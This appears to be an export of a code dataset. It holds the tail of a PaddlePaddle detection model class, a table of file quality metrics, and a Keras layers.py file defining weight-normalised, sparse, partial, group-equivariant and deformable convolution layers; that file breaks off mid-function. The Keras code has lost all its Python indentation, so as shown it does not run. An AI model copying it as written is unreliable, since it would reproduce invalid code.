            'ind': {'shape': [None, max_tag_len], 'dtype': 'int64', 'lod_level': 0},
            'wh': {'shape': [None, max_tag_len, 2], 'dtype': 'float32', 'lod_level': 0},
            'tlbr': {'shape': [None, 2, output_size[1], output_size[0]], 'dtype': 'float32', 'lod_level': 0},
            'tlbr_mask': {'shape': [None, 1, output_size[1], output_size[0]], 'dtype': 'float32', 'lod_level': 0},
            'heat_weight': {'shape': [None, C, output_size[1], output_size[0]], 'dtype': 'float32', 'lod_level': 0},
            'is_difficult': {'shape': [None, 1], 'dtype': 'int32', 'lod_level': 0},
        }
        # yapf: enable
        return inputs_def

    def build_inputs(
            self,
            image_shape=[3, None, None],
            fields=[
                'image', 'im_id', 'gt_box', 'gt_class', 'heatmaps',
                'regrs', 'reg_mask', 'ind', 'wh',
            ],  # for train
            multi_scale=False,
            test_scales=[1.0],
            use_flip=None,
            output_size=[128, 128],
            max_tag_len=128,
            use_dataloader=True,
            iterable=False):
        inputs_def = self._inputs_def(image_shape, output_size, max_tag_len)
        fields = copy.deepcopy(fields)
        if multi_scale:
            ms_def, ms_fields = corner_multiscale_def(image_shape, test_scales, use_flip)
            inputs_def.update(ms_def)
            fields += ms_fields
            self.use_flip = use_flip
            self.test_scales = test_scales
        feed_vars = OrderedDict([(key, fluid.data(
            name=key,
            shape=inputs_def[key]['shape'],
            dtype=inputs_def[key]['dtype'],
            lod_level=inputs_def[key]['lod_level'])) for key in fields])
        loader = fluid.io.DataLoader.from_generator(
            feed_list=list(feed_vars.values()),
            capacity=64,
            use_double_buffer=True,
            iterable=iterable) if use_dataloader else None
        return feed_vars, loader

    def train(self, feed_vars):
        return self.build(feed_vars, mode='train')

    def eval(self, feed_vars, multi_scale=None):
        if multi_scale:
            return self.build_multi_scale(feed_vars)
        return self.build(feed_vars, mode='test')

    def test(self, feed_vars):
        return self.build(feed_vars, mode='test')
```

| column | value |
|---|---|
| avg_line_length | 41.647668 |
| max_line_length | 116 |
| alphanum_fraction | 0.58323 |
| qsc_code_num_words_quality_signal | 965 |
| qsc_code_num_chars_quality_signal | 8,038 |
| qsc_code_mean_word_length_quality_signal | 4.574093 |
| qsc_code_frac_words_unique_quality_signal | 0.219689 |
| qsc_code_frac_chars_top_2grams_quality_signal | 0.043498 |
| qsc_code_frac_chars_top_3grams_quality_signal | 0.028546 |
| qsc_code_frac_chars_top_4grams_quality_signal | 0.054372 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | 0.263706 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | 0.22406 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | 0.181921 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | 0.142501 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | 0.110784 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | 0.083371 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | 0 |
| qsc_code_frac_chars_digital_quality_signal | 0.01913 |
| qsc_code_frac_chars_whitespace_quality_signal | 0.291117 |
| qsc_code_size_file_byte_quality_signal | 8,038 |
| qsc_code_num_lines_quality_signal | 192 |
| qsc_code_num_chars_line_max_quality_signal | 117 |
| qsc_code_num_chars_line_mean_quality_signal | 41.864583 |
| qsc_code_frac_chars_alphabet_quality_signal | 0.755528 |
| qsc_code_frac_chars_comments_quality_signal | 0.061707 |
| qsc_code_cate_xml_start_quality_signal | 0 |
| qsc_code_frac_lines_dupe_lines_quality_signal | 0.063694 |
| qsc_code_cate_autogen_quality_signal | 0 |
| qsc_code_frac_lines_long_string_quality_signal | 0 |
| qsc_code_frac_chars_string_length_quality_signal | 0.107472 |
| qsc_code_frac_chars_long_word_length_quality_signal | 0 |
| qsc_code_frac_lines_string_concat_quality_signal | 0 |
| qsc_code_cate_encoded_data_quality_signal | 0 |
| qsc_code_frac_chars_hex_words_quality_signal | 0 |
| qsc_code_frac_lines_prompt_comments_quality_signal | 0 |
| qsc_code_frac_lines_assert_quality_signal | 0.006369 |
| qsc_codepython_cate_ast_quality_signal | 1 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | 0.063694 |
| qsc_codepython_cate_var_zero_quality_signal | false |
| qsc_codepython_frac_lines_pass_quality_signal | 0 |
| qsc_codepython_frac_lines_import_quality_signal | 0.089172 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | 0.012739 |
| qsc_codepython_score_lines_no_logic_quality_signal | 0.242038 |
| qsc_codepython_frac_lines_print_quality_signal | 0.006369 |
| effective | 1 |
| hits | 0 |

All mirrored `qsc_*` columns without the `_quality_signal` suffix are 0 for this row, except `qsc_code_frac_words_unique` and `qsc_code_frac_lines_string_concat`, which are null.
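Signals like these exist to support corpus filtering. A hypothetical pandas filter over rows of this table (the column names come from the schema; the thresholds and the file name are invented for illustration):

```python
import pandas as pd

df = pd.read_parquet("shard.parquet")  # placeholder path, as above
keep = df[
    (df["alphanum_fraction"] > 0.25)
    & (df["max_line_length"] < 1000)
    & (df["qsc_code_cate_autogen_quality_signal"] == 0)            # not auto-generated
    & (df["qsc_codepython_cate_ast_quality_signal"] == 1)          # file parses as Python
]
print(len(keep), "of", len(df), "rows kept")
```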
**Row 5 · `kiranscaria/keras_layers` · `layers.py`**

| field | value |
|---|---|
| hexsha | ee81731e37bb731eaceac3e8565f9dcaff9847fa |
| size | 55,219 |
| ext / lang | py / Python |
| repo head hexsha | 1934c4c7a13bfc0be40b224fe586d1c0ffa9f18d |
| licenses | ["MIT"] |
| stars / issues / forks counts and event datetimes | null |

The `max_stars_*`, `max_issues_*`, and `max_forks_*` path, name, head-hexsha, and license fields all carry the same values for this row.

`content`:

```python
import numpy as np
import tensorflow as tf
from tensorflow.python.keras import backend as K
from tensorflow.python.keras.layers import Layer, Lambda
from tensorflow.python.keras.layers import InputSpec
from tensorflow.python.ops import nn_ops
from tensorflow.python.keras import initializers, regularizers, constraints, activations
from tensorflow.python.keras.utils import conv_utils
def gaussian_init(shape, dtype=None, partition_info=None):
v = np.random.randn(*shape)
v = np.clip(v, -3, +3)
return K.constant(v, dtype=dtype)
def conv_init_linear(shape, dtype=None, partition_info=None):
v = np.random.randn(*shape)
v = np.clip(v, -3, +3)
fan_in = np.prod(shape[:3])
v = v / (fan_in**0.5)
return K.constant(v, dtype=dtype)
def conv_init_relu(shape, dtype=None, partition_info=None):
v = np.random.randn(*shape)
v = np.clip(v, -3, +3)
fan_in = np.prod(shape[:3])
v = v / (fan_in**0.5) * 2**0.5
return K.constant(v, dtype=dtype)
def conv_init_relu2(shape, dtype=None, partition_info=None):
v = np.random.randn(*shape)
v = np.clip(v, -3, +3)
fan_in = np.prod(shape[:3])
v = v / (fan_in**0.5) * 2
return K.constant(v, dtype=dtype)
def depthwiseconv_init_linear(shape, dtype=None, partition_info=None):
v = np.random.randn(*shape)
v = np.clip(v, -3, +3)
fan_in = np.prod(shape[:2])
v = v / (fan_in**0.5)
return K.constant(v, dtype=dtype)
def depthwiseconv_init_relu(shape, dtype=None, partition_info=None):
v = np.random.randn(*shape)
v = np.clip(v, -3, +3)
fan_in = np.prod(shape[:2])
v = v / (fan_in**0.5) * 2**0.5
return K.constant(v, dtype=dtype)
class Conv2DBaseLayer(Layer):
"""Basic Conv2D class from which other layers inherit.
"""
def __init__(self,
kernel_size,
strides=(1, 1),
padding='valid',
#data_format=None,
dilation_rate=(1, 1),
activation=None,
use_bias=False,
kernel_initializer='glorot_uniform',
kernel_regularizer=None,
kernel_constraint=None,
bias_initializer='zeros',
bias_regularizer=None,
bias_constraint=None,
activity_regularizer=None,
**kwargs):
super(Conv2DBaseLayer, self).__init__(
activity_regularizer=regularizers.get(activity_regularizer), **kwargs)
self.rank = rank = 2
self.kernel_size = conv_utils.normalize_tuple(kernel_size, rank, 'kernel_size')
self.strides = conv_utils.normalize_tuple(strides, rank, 'strides')
self.padding = conv_utils.normalize_padding(padding)
self.dilation_rate = conv_utils.normalize_tuple(dilation_rate, rank, 'dilation_rate')
self.activation = activations.get(activation)
self.use_bias = use_bias
self.kernel_initializer = initializers.get(kernel_initializer)
self.kernel_regularizer = regularizers.get(kernel_regularizer)
self.kernel_constraint = constraints.get(kernel_constraint)
self.bias_initializer = initializers.get(bias_initializer)
self.bias_regularizer = regularizers.get(bias_regularizer)
self.bias_constraint = constraints.get(bias_constraint)
def get_config(self):
config = super(Conv2DBaseLayer, self).get_config()
config.update({
'kernel_size': self.kernel_size,
'strides': self.strides,
'padding': self.padding,
'dilation_rate': self.dilation_rate,
'activation': activations.serialize(self.activation),
'use_bias': self.use_bias,
'kernel_initializer': initializers.serialize(self.kernel_initializer),
'kernel_regularizer': regularizers.serialize(self.kernel_regularizer),
'kernel_constraint': constraints.serialize(self.kernel_constraint),
'bias_initializer': initializers.serialize(self.bias_initializer),
'bias_regularizer': regularizers.serialize(self.bias_regularizer),
'bias_constraint': constraints.serialize(self.bias_constraint),
'activity_regularizer': regularizers.serialize(self.activity_regularizer),
})
return config
class Conv2D(Conv2DBaseLayer):
"""Conv2D Layer with Weight Normalization.
# Arguments
They are the same as for the normal Conv2D layer.
weightnorm: Boolean flag, whether Weight Normalization is used or not.
# References
[Weight Normalization: A Simple Reparameterization to Accelerate Training of Deep Neural Networks](http://arxiv.org/abs/1602.07868)
"""
def __init__(self, filters, kernel_size, weightnorm=False, eps=1e-6, **kwargs):
super(Conv2D, self).__init__(kernel_size, **kwargs)
self.filters = filters
self.weightnorm = weightnorm
self.eps = eps
def build(self, input_shape):
if type(input_shape) is list:
feature_shape = input_shape[0]
else:
feature_shape = input_shape
self.kernel_shape = (*self.kernel_size, feature_shape[-1], self.filters)
self.kernel = self.add_weight(name='kernel',
shape=self.kernel_shape,
initializer=self.kernel_initializer,
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint,
trainable=True,
dtype=self.dtype)
if self.weightnorm:
self.wn_g = self.add_weight(name='wn_g',
shape=(self.filters,),
initializer=initializers.Ones(),
trainable=True,
dtype=self.dtype)
if self.use_bias:
self.bias = self.add_weight(name='bias',
shape=(self.filters,),
initializer=self.bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint,
trainable=True,
dtype=self.dtype)
else:
self.bias = None
super(Conv2D, self).build(input_shape)
def call(self, inputs, **kwargs):
if type(inputs) is list:
features = inputs[0]
else:
features = inputs
if self.weightnorm:
norm = tf.sqrt(tf.reduce_sum(tf.square(self.kernel), (0,1,2)) + self.eps)
kernel = self.kernel / norm * self.wn_g
else:
kernel = self.kernel
features = K.conv2d(features, kernel,
strides=self.strides,
padding=self.padding,
dilation_rate=self.dilation_rate)
if self.use_bias:
features = tf.add(features, self.bias)
if self.activation is not None:
features = self.activation(features)
return features
def get_config(self):
config = super(Conv2D, self).get_config()
config.update({
'filters': self.filters,
'weightnorm': self.weightnorm,
'eps': self.eps,
})
return config
class SparseConv2D(Conv2DBaseLayer):
"""2D Sparse Convolution layer for sparse input data.
# Arguments
They are the same as for the normal Conv2D layer.
binary: Boolean flag, whether the sparsity is propagated as binary
mask or as float values.
# Input shape
features: 4D tensor with shape (batch_size, rows, cols, channels)
mask: 4D tensor with shape (batch_size, rows, cols, 1)
If no mask is provided, all input pixels with features unequal
to zero are considered as valid.
# Example
x, m = SparseConv2D(32, 3, padding='same')(x)
x = Activation('relu')(x)
x, m = SparseConv2D(32, 3, padding='same')([x,m])
x = Activation('relu')(x)
# Notes
Sparse Convolution propagates the sparsity of the input data
through the network using a 2D mask.
# References
[Sparsity Invariant CNNs](https://arxiv.org/abs/1708.06500)
"""
def __init__(self, filters, kernel_size,
kernel_initializer=conv_init_relu,
binary=True,
**kwargs):
super(SparseConv2D, self).__init__(kernel_size, kernel_initializer=kernel_initializer, **kwargs)
self.filters = filters
self.binary = binary
def build(self, input_shape):
if type(input_shape) is list:
feature_shape = input_shape[0]
else:
feature_shape = input_shape
self.kernel_shape = (*self.kernel_size, feature_shape[-1], self.filters)
self.kernel = self.add_weight(name='kernel',
shape=self.kernel_shape,
initializer=self.kernel_initializer,
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint,
trainable=True,
dtype=self.dtype)
self.mask_kernel_shape = (*self.kernel_size, 1, 1)
self.mask_kernel = tf.ones(self.mask_kernel_shape)
self.mask_fan_in = tf.reduce_prod(self.mask_kernel_shape[:3])
if self.use_bias:
self.bias = self.add_weight(name='bias',
shape=(self.filters,),
initializer=self.bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint,
trainable=True,
dtype=self.dtype)
else:
self.bias = None
super(SparseConv2D, self).build(input_shape)
def call(self, inputs, **kwargs):
if type(inputs) is list:
features = inputs[0]
mask = inputs[1]
else:
# if no mask is provided, get it from the features
features = inputs
mask = tf.where(tf.equal(tf.reduce_sum(features, axis=-1, keepdims=True), 0), 0.0, 1.0)
features = tf.multiply(features, mask)
features = nn_ops.convolution(features, self.kernel, self.padding.upper(), self.strides, self.dilation_rate)
norm = nn_ops.convolution(mask, self.mask_kernel, self.padding.upper(), self.strides, self.dilation_rate)
mask_fan_in = tf.cast(self.mask_fan_in, 'float32')
if self.binary:
mask = tf.where(tf.greater(norm,0), 1.0, 0.0)
else:
mask = norm / mask_fan_in
#ratio = tf.where(tf.equal(norm,0), 0.0, 1/norm) # Note: The authors use this in the paper, but it would require special initialization...
ratio = tf.where(tf.equal(norm,0), 0.0, mask_fan_in/norm)
features = tf.multiply(features, ratio)
if self.use_bias:
features = tf.add(features, self.bias)
if self.activation is not None:
features = self.activation(features)
return [features, mask]
def compute_output_shape(self, input_shape):
if type(input_shape) is list:
feature_shape = input_shape[0]
else:
feature_shape = input_shape
space = feature_shape[1:-1]
new_space = []
for i in range(len(space)):
new_dim = conv_utils.conv_output_length(
space[i],
self.kernel_size[i],
padding=self.padding,
stride=self.strides[i],
dilation=self.dilation_rate[i])
new_space.append(new_dim)
feature_shape = [feature_shape[0], *new_space, self.filters]
mask_shape = [*feature_shape[:-1], 1]
return [feature_shape, mask_shape]
def get_config(self):
config = super(SparseConv2D, self).get_config()
config.update({
'filters': self.filters,
'binary': self.binary,
})
return config
class PartialConv2D(Conv2DBaseLayer):
"""2D Partial Convolution layer for sparse input data.
# Arguments
They are the same as for the normal Conv2D layer.
binary: Boolean flag, whether the sparsity is propagated as binary
mask or as float values.
# Input shape
features: 4D tensor with shape (batch_size, rows, cols, channels)
mask: 4D tensor with shape (batch_size, rows, cols, channels)
If the shape is (batch_size, rows, cols, 1), the mask is repeated
for each channel. If no mask is provided, all input elements
unequal to zero are considered as valid.
# Example
x, m = PartialConv2D(32, 3, padding='same')(x)
x = Activation('relu')(x)
x, m = PartialConv2D(32, 3, padding='same')([x,m])
x = Activation('relu')(x)
# Notes
In contrast to Sparse Convolution, Partial Convolution propagates
the sparsity for each channel separately. This makes it possible
to concatenate the features and the masks from different branches
in architecture.
# References
[Image Inpainting for Irregular Holes Using Partial Convolutions](https://arxiv.org/abs/1804.07723)
[Sparsity Invariant CNNs](https://arxiv.org/abs/1708.06500)
"""
def __init__(self, filters, kernel_size,
kernel_initializer=conv_init_relu,
binary=True,
weightnorm=False,
eps=1e-6,
**kwargs):
super(PartialConv2D, self).__init__(kernel_size, kernel_initializer=kernel_initializer, **kwargs)
self.filters = filters
self.binary = binary
self.weightnorm = weightnorm
self.eps = eps
def build(self, input_shape):
if type(input_shape) is list:
feature_shape = input_shape[0]
mask_shape = input_shape[1]
self.mask_shape = mask_shape
else:
feature_shape = input_shape
self.mask_shape = feature_shape
self.kernel_shape = (*self.kernel_size, feature_shape[-1], self.filters)
self.kernel = self.add_weight(name='kernel',
shape=self.kernel_shape,
initializer=self.kernel_initializer,
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint,
trainable=True,
dtype=self.dtype)
self.mask_kernel_shape = (*self.kernel_size, feature_shape[-1], self.filters)
self.mask_kernel = tf.ones(self.mask_kernel_shape)
self.mask_fan_in = tf.reduce_prod(self.mask_kernel_shape[:3])
if self.weightnorm:
self.wn_g = self.add_weight(name='wn_g',
shape=(self.filters,),
initializer=initializers.Ones(),
trainable=True,
dtype=self.dtype)
if self.use_bias:
self.bias = self.add_weight(name='bias',
shape=(self.filters,),
initializer=self.bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint,
trainable=True,
dtype=self.dtype)
else:
self.bias = None
super(PartialConv2D, self).build(input_shape)
def call(self, inputs, **kwargs):
if type(inputs) is list:
features = inputs[0]
mask = inputs[1]
# if mask has only one channel, repeat
if self.mask_shape[-1] == 1:
mask = tf.repeat(mask, tf.shape(features)[-1], axis=-1)
else:
# if no mask is provided, get it from the features
features = inputs
mask = tf.where(tf.equal(features, 0), 0.0, 1.0)
if self.weightnorm:
norm = tf.sqrt(tf.reduce_sum(tf.square(self.kernel), (0,1,2)) + self.eps)
kernel = self.kernel / norm * self.wn_g
else:
kernel = self.kernel
mask_kernel = self.mask_kernel
features = tf.multiply(features, mask)
features = nn_ops.convolution(features, kernel, self.padding.upper(), self.strides, self.dilation_rate)
norm = nn_ops.convolution(mask, mask_kernel, self.padding.upper(), self.strides, self.dilation_rate)
mask_fan_in = tf.cast(self.mask_fan_in, 'float32')
if self.binary:
mask = tf.where(tf.greater(norm,0), 1.0, 0.0)
else:
mask = norm / mask_fan_in
ratio = tf.where(tf.equal(norm,0), 0.0, mask_fan_in/norm)
features = tf.multiply(features, ratio)
if self.use_bias:
features = tf.add(features, self.bias)
if self.activation is not None:
features = self.activation(features)
return [features, mask]
def compute_output_shape(self, input_shape):
if type(input_shape) is list:
feature_shape = input_shape[0]
else:
feature_shape = input_shape
space = feature_shape[1:-1]
new_space = []
for i in range(len(space)):
new_dim = conv_utils.conv_output_length(
space[i],
self.kernel_size[i],
padding=self.padding,
stride=self.strides[i],
dilation=self.dilation_rate[i])
new_space.append(new_dim)
feature_shape = [feature_shape[0], *new_space, self.filters]
mask_shape = [feature_shape[0], *new_space, self.filters]
return [feature_shape, mask_shape]
def get_config(self):
config = super(PartialConv2D, self).get_config()
config.update({
'filters': self.filters,
'binary': self.binary,
'weightnorm': self.weightnorm,
'eps': self.eps,
})
return config
class GroupConv2D(Conv2DBaseLayer):
"""2D Group Convolution layer that shares weights over symmetries.
Group Convolution provides discrete rotation equivariance. It reduces the number
of parameters and typically lead to better results.
The following two finite groups are supported:
Cyclic Group C4 (p4, 4 rotational symmetries)
Dihedral Group D4 (p4m, 4 rotational and 4 reflection symmetries)
# Arguments
They are the same as for the normal Conv2D layer.
filters: int, The effective number of filters is this value multiplied by the
number of transformations in the group (4 for C4 and 8 for D4)
kernel_size: int, Only odd values are supported
group: 'C4' or 'D4', Stay with one group when stacking layers
# Input shape
featurs: 4D tensor with shape (batch_size, rows, cols, in_channels)
or 5D tensor with shape (batch_size, rows, cols, num_transformations, in_channels)
# Output shape
featurs: 5D tensor with shape (batch_size, rows, cols, num_transformations, out_channels)
# Notes
- BatchNormalization works as expected and shares the statistict over symmetries.
- Spatial Pooling can be done via AvgPool3D.
- Pooling along the group dimension can be done via MaxPool3D.
- Concatenation along the group dimension can be done via Reshape.
- To get a model with the inference time of a normal CNN, you can load the
expanded kernel into a normal Conv2D layer. The kernel expansion is
done in the 'call' method and the expanded kernel is stored in the
'transformed_kernel' attribute.
# Example
x = Input((16,16,3))
x = GroupConv2D(12, 3, group='D4', padding='same', activation='relu')(x)
x = BatchNormalization()(x)
x = GroupConv2D(12, 3, group='D4', padding='same', activation='relu')(x)
x = AvgPool3D(pool_size=(2,2,1), strides=(2,2,1), padding='same')(x)
x = GroupConv2D(12, 3, group='D4', padding='same', activation='relu')(x)
x = MaxPool3D(pool_size=(1,1,x.shape[-2]))(x)
s = x.shape
x = Reshape((s[1],s[2],s[3]*s[4]))(x)
# References
[Group Equivariant Convolutional Networks](https://arxiv.org/abs/1602.07576)
[Rotation Equivariant CNNs for Digital Pathology](https://arxiv.org/abs/1806.03962)
https://github.com/tscohen/GrouPy
https://github.com/basveeling/keras-gcnn
"""
def __init__(self, filters, kernel_size, group='D4', **kwargs):
super(GroupConv2D, self).__init__(kernel_size, **kwargs)
if not self.kernel_size[0] == self.kernel_size[1]:
raise ValueError('Requires square kernel')
if self.kernel_size[0] % 2 != 1:
raise ValueError('Requires odd kernel size')
group = group.upper()
if group == 'C4':
self.num_transformations = 4
elif group == 'D4':
self.num_transformations = 8
else:
raise ValueError('Unknown group')
self.filters = filters
self.group = group
self.input_spec = InputSpec(min_ndim=4, max_ndim=5)
def compute_output_shape(self, input_shape):
space = input_shape[1:3]
new_space = []
for i in range(len(space)):
new_dim = conv_utils.conv_output_length(
space[i],
self.kernel_size[i],
padding=self.padding,
stride=self.strides[i],
dilation=self.dilation_rate[i])
new_space.append(new_dim)
return (input_shape[0], *new_space, self.num_transformations, self.filters)
def build(self, input_shape):
if len(input_shape) == 4:
self.first = True
num_in_channels = input_shape[-1]
else:
self.first = False
num_in_channels = input_shape[-2] * input_shape[-1]
self.kernel = self.add_weight(name='kernel',
shape=(*self.kernel_size, num_in_channels, self.filters),
initializer=self.kernel_initializer,
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint,
trainable=True,
dtype=self.dtype)
if self.use_bias:
self.bias = self.add_weight(name='bias',
shape=(self.filters,),
initializer=self.bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint,
trainable=True,
dtype=self.dtype)
else:
self.bias = None
self.built = True
def call(self, features):
ni = features.shape[-1]
no = self.filters
if self.group == 'C4':
nt = 4
elif self.group == 'D4':
nt = 8
nti = 1 if self.first else nt
nto = nt
k = self.kernel_size[0]
t = np.reshape(np.arange(nti*k*k), (nti,k,k))
trafos = [np.rot90(t,k,axes=(1, 2)) for k in range(4)]
if nt == 8:
trafos = trafos + [np.flip(t,1) for t in trafos]
self.trafos = trafos = np.array(trafos)
# index magic happens here
if nti == 1:
indices = trafos
elif nti == 4:
indices = [[trafos[l, (m-l)%4 ,:,:] for m in range(4)] for l in range(4)]
elif nti == 8:
indices = [[trafos[l, (m-l)%4 if ((m < 4) == (l < 4)) else (m+l)%4+4 ,:,:] for m in range(8)] for l in range(8)]
self.indices = indices = np.reshape(indices, (nto,nti,k,k))
# transform the kernel
kernel = self.kernel
kernel = tf.reshape(kernel, (nti*k*k, ni, no))
kernel = tf.gather(kernel, indices, axis=0)
kernel = tf.reshape(kernel, (nto, nti, k,k, ni, no))
kernel = tf.transpose(kernel, (2,3,1,4,0,5))
kernel = tf.reshape(kernel, (k,k, nti*ni, nto*no))
self.transformed_kernel = kernel
if self.first:
x = features
else:
s = features.shape
x = tf.reshape(features, (-1,s[1],s[2],s[3]*s[4]))
x = K.conv2d(x, kernel, strides=self.strides, padding=self.padding, dilation_rate=self.dilation_rate)
s = x.shape
x = tf.reshape(x, (-1,s[1],s[2],nto,no))
features = x
if self.use_bias:
features = tf.add(features, self.bias)
if self.activation is not None:
features = self.activation(features)
return features
def get_config(self):
config = super(GroupConv2D, self).get_config()
config.update({
'filters': self.filters,
'group': self.group,
})
return config
class DeformableConv2D(Conv2DBaseLayer):
"""2D Deformable Convolution layer that learns the spatial offsets where
the input elements of the convolution are sampled.
The layer is basically a updated version of An Jiaoyang's code.
# Notes
- A layer does not use a native CUDA kernel which would have better
performance https://github.com/tensorflow/addons/issues/179
# References
[Deformable Convolutional Networks](https://arxiv.org/abs/1703.06211)
# related code
https://github.com/DHZS/tf-deformable-conv-layer (An Jiaoyang, 2018-10-11)
"""
def __init__(self, filters, kernel_size, num_deformable_group=None, **kwargs):
"""`kernel_size`, `strides` and `dilation_rate` must have the same value in both axis.
:param num_deformable_group: split output channels into groups, offset shared in each group. If
this parameter is None, then set num_deformable_group=filters.
"""
super(DeformableConv2D, self).__init__(kernel_size, **kwargs)
if not self.kernel_size[0] == self.kernel_size[1]:
raise ValueError('Requires square kernel')
if not self.strides[0] == self.strides[1]:
raise ValueError('Requires equal stride')
if not self.dilation_rate[0] == self.dilation_rate[1]:
raise ValueError('Requires equal dilation')
self.filters = filters
if num_deformable_group is None:
num_deformable_group = filters
if filters % num_deformable_group != 0:
raise ValueError('"filters" mod "num_deformable_group" must be zero')
self.num_deformable_group = num_deformable_group
self.kernel = None
self.bias = None
self.offset_layer_kernel = None
self.offset_layer_bias = None
def build(self, input_shape):
input_dim = input_shape[-1]
# kernel_shape = self.kernel_size + (input_dim, self.filters)
# we want to use depth-wise conv
kernel_shape = self.kernel_size + (self.filters * input_dim, 1)
self.kernel = self.add_weight(name='kernel',
shape=kernel_shape,
initializer=self.kernel_initializer,
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint,
trainable=True,
dtype=self.dtype)
if self.use_bias:
self.bias = self.add_weight(name='bias',
shape=(self.filters,),
initializer=self.bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint,
trainable=True,
dtype=self.dtype)
# create offset conv layer
offset_num = self.kernel_size[0] * self.kernel_size[1] * self.num_deformable_group
self.offset_layer_kernel = self.add_weight(name='offset_layer_kernel',
shape=self.kernel_size + (input_dim, offset_num * 2), # 2 means x and y axis
initializer=tf.zeros_initializer(),
regularizer=self.kernel_regularizer,
trainable=True,
dtype=self.dtype)
self.offset_layer_bias = self.add_weight(name='offset_layer_bias',
shape=(offset_num * 2,),
initializer=tf.zeros_initializer(),
# initializer=tf.random_uniform_initializer(-5, 5),
regularizer=self.bias_regularizer,
trainable=True,
dtype=self.dtype)
self.built = True
def call(self, inputs, training=None, **kwargs):
# get offset, shape [batch_size, out_h, out_w, filter_h, * filter_w * channel_out * 2]
offset = tf.nn.conv2d(inputs,
filters=self.offset_layer_kernel,
strides=[1, *self.strides, 1],
padding=self.padding.upper(),
dilations=[1, *self.dilation_rate, 1])
offset += self.offset_layer_bias
# add padding if needed
inputs = self._pad_input(inputs)
# some length
batch_size = tf.shape(inputs)[0]
channel_in = int(inputs.shape[-1])
in_h, in_w = [int(i) for i in inputs.shape[1: 3]] # input feature map size
out_h, out_w = [int(i) for i in offset.shape[1: 3]] # output feature map size
filter_h, filter_w = self.kernel_size
# get x, y axis offset
offset = tf.reshape(offset, [batch_size, out_h, out_w, -1, 2])
y_off, x_off = offset[:, :, :, :, 0], offset[:, :, :, :, 1]
# input feature map gird coordinates
y, x = self._get_conv_indices([in_h, in_w])
y, x = [tf.expand_dims(i, axis=-1) for i in [y, x]]
y, x = [tf.tile(i, [batch_size, 1, 1, 1, self.num_deformable_group]) for i in [y, x]]
y, x = [tf.reshape(i, [batch_size, *i.shape[1: 3], -1]) for i in [y, x]]
y, x = [tf.cast(i, 'float32') for i in [y, x]]
# add offset
y, x = y + y_off, x + x_off
y = tf.clip_by_value(y, 0, in_h - 1)
x = tf.clip_by_value(x, 0, in_w - 1)
# get four coordinates of points around (x, y)
y0, x0 = [tf.cast(tf.floor(i), 'int32') for i in [y, x]]
y1, x1 = y0 + 1, x0 + 1
# clip
y0, y1 = [tf.clip_by_value(i, 0, in_h - 1) for i in [y0, y1]]
x0, x1 = [tf.clip_by_value(i, 0, in_w - 1) for i in [x0, x1]]
# get pixel values
indices = [[y0, x0], [y0, x1], [y1, x0], [y1, x1]]
p0, p1, p2, p3 = [DeformableConv2D._get_pixel_values_at_point(inputs, i) for i in indices]
# cast to float
x0, x1, y0, y1 = [tf.cast(i, 'float32') for i in [x0, x1, y0, y1]]
# weights
w0 = (y1 - y) * (x1 - x)
w1 = (y1 - y) * (x - x0)
w2 = (y - y0) * (x1 - x)
w3 = (y - y0) * (x - x0)
# expand dim for broadcast
w0, w1, w2, w3 = [tf.expand_dims(i, axis=-1) for i in [w0, w1, w2, w3]]
# bilinear interpolation
pixels = tf.add_n([w0 * p0, w1 * p1, w2 * p2, w3 * p3])
# reshape the "big" feature map
pixels = tf.reshape(pixels, [batch_size, out_h, out_w, filter_h, filter_w, self.num_deformable_group, channel_in])
pixels = tf.transpose(pixels, [0, 1, 3, 2, 4, 5, 6])
pixels = tf.reshape(pixels, [batch_size, out_h * filter_h, out_w * filter_w, self.num_deformable_group, channel_in])
# copy channels to same group
feat_in_group = self.filters // self.num_deformable_group
pixels = tf.tile(pixels, [1, 1, 1, 1, feat_in_group])
pixels = tf.reshape(pixels, [batch_size, out_h * filter_h, out_w * filter_w, -1])
# depth-wise conv
out = tf.nn.depthwise_conv2d(pixels, self.kernel, [1, filter_h, filter_w, 1], 'VALID')
# add the output feature maps in the same group
out = tf.reshape(out, [batch_size, out_h, out_w, self.filters, channel_in])
out = tf.reduce_sum(out, axis=-1)
if self.use_bias:
out += self.bias
return self.activation(out)
def _pad_input(self, inputs):
"""Check if input feature map needs padding, because we don't use the standard Conv() function.
:param inputs:
:return: padded input feature map
"""
# When padding is 'same', we should pad the feature map.
# if padding == 'same', output size should be `ceil(input / stride)`
if self.padding == 'same':
in_shape = inputs.shape.as_list()[1:3]
padding_list = []
for i in range(2):
filter_size = self.kernel_size[i]
dilation = self.dilation_rate[i]
dilated_filter_size = filter_size + (filter_size - 1) * (dilation - 1)
same_output = (in_shape[i] + self.strides[i] - 1) // self.strides[i]
valid_output = (in_shape[i] - dilated_filter_size + self.strides[i]) // self.strides[i]
if same_output == valid_output:
padding_list += [0, 0]
else:
p = dilated_filter_size - 1
p_0 = p // 2
padding_list += [p_0, p - p_0]
if sum(padding_list) != 0:
padding = [[0, 0],
[padding_list[0], padding_list[1]], # top, bottom padding
[padding_list[2], padding_list[3]], # left, right padding
[0, 0]]
inputs = tf.pad(inputs, padding)
return inputs
def _get_conv_indices(self, feature_map_size):
"""the x, y coordinates in the window when a filter sliding on the feature map
:param feature_map_size:
:return: y, x with shape [1, out_h, out_w, filter_h * filter_w]
"""
feat_h, feat_w = [int(i) for i in feature_map_size[0: 2]]
x, y = tf.meshgrid(tf.range(feat_w), tf.range(feat_h))
